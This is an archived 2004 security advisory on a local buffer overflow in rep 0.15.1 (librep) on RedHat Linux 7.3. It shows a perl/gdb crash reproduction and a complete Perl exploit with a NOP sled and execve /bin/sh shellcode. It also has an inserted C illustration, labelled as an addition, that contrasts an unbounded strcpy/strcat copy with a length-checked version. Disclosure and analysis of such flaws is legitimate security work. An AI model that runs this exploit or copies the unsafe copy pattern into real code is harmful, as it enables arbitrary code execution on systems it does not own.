[UNIX] Local Buffer Overflow in REP (Long ARG)

2004-03-24T00:00:00
ID SECURITYVULNS:DOC:5959
Type securityvulns
Reporter Securityvulns
Modified 2004-03-24T00:00:00

Description

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Local Buffer Overflow in REP (Long ARG)

SUMMARY

rep stands for "Read, Eval, Print", the three main components of any Lisp system. Librep is a dialect of Lisp, designed to be used both as an extension language for applications, and for use as a general programming language. A vulnerability in rep allows a local user to execute arbitrary code.

DETAILS

Vulnerable Systems:
 * RedHat Linux 7.3, kernel version 2.4.20 (prior versions might also be affected)
 * rep version 0.15.1

To exploit the vulnerability, simply input as first ARG a buffer string of 4081 bytes:

$ declare -x BADBUFFER=`perl -e '{print "A"x"4081"}'`
$ rep $BADBUFFER
Segmentation fault
$ gdb rep
(gdb) r $BADBUFFER
Program received signal SIGSEGV, Segmentation fault.
0x4003f3cd in Fexpand_file_name () from /usr/lib/librep.so.9
(gdb) info reg esp
esp            0xbf414139      0xbf414139
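As an added illustration (not librep's source, which this advisory does not include), the fixed-size stack buffer pattern that produces a crash like the one in Fexpand_file_name above, beside a bounded version that refuses an argument it cannot hold. The function names, the 4096-byte buffer and the directory prefix are assumptions; the length check is what a fix for this class of bug looks like.

```c
/* Added example, not librep's own code: a hypothetical file-name
 * expansion routine built on a fixed-size stack buffer, beside a
 * bounded version that fails closed on oversized input. */
#include <stdio.h>
#include <string.h>

#define PATH_BUF 4096   /* assumed buffer size, not taken from librep */

/* Vulnerable pattern (hypothetical): copies caller data into a fixed
 * stack buffer without checking its length. Shown only for contrast;
 * a long name overruns buf and corrupts the saved return address. */
void expand_file_name_unsafe(const char *dir, const char *name, char *out)
{
    char buf[PATH_BUF];
    strcpy(buf, dir);      /* no bound on dir */
    strcat(buf, "/");
    strcat(buf, name);     /* no bound on name: this is the overflow */
    strcpy(out, buf);
}

/* Hardened form: compute the total length first and reject input that
 * would not fit, so the caller gets an error instead of a crash.
 * Returns 0 on success, -1 if the expanded name does not fit in out. */
int expand_file_name_safe(const char *dir, const char *name,
                          char *out, size_t outlen)
{
    size_t need = strlen(dir) + 1 + strlen(name) + 1; /* dir '/' name NUL */
    if (need > outlen)
        return -1;
    int n = snprintf(out, outlen, "%s/%s", dir, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Check helper: returns 1 if an argument of `len` 'A' bytes (like the
 * advisory's BADBUFFER) is rejected by the safe expander, 0 if it is
 * accepted, -1 if len is too large for the scratch buffer. */
int long_arg_rejected(size_t len)
{
    char arg[8192];
    char out[PATH_BUF];
    if (len >= sizeof arg)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    /* assumed directory prefix; with it a 4081-byte name exceeds PATH_BUF */
    return expand_file_name_safe("/home/user/projects", arg,
                                 out, sizeof out) == -1;
}
```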

Exploit Code:

#!/usr/bin/perl -w
#
# RedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit
#
# Legal notes :
# The BlackAngels staff refuse all responsibilities for an incorrect
# or illegal use of this code or for eventual damages to others systems.
#
# For more information:
# [ http://www.blackangels.it ] - ( staff[at]blackangels.it )

$len = 4260;
$ret = 0xbf414139;
$nop = "\x90";

print "\nRedHat Linux 7.3 local Buffer Overflow in REP 0.15.1 exploit";
print "\nVulnerable versions: RedHat Linux 7.3 with 2.4.20";
print "\n============================================================\n";

if (!$ARGV[0]) {
    print "You must specify an offset [ Default = -1000 ] ...\n\n";
    exit(-1);
}

my $offset = "$ARGV[0]";

$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";

print "Trying to execute /bin/sh ...\n";

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print("\nAddress: 0x", sprintf('%lx',($ret + $offset)), "\n");
print "\tRet: $ret + Offset: $offset\n\n";

$new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

exec("/usr/bin/rep $buffer");

ADDITIONAL INFORMATION

The information has been provided by <mailto:staff@blackangels.it> BlackAngels Staff.
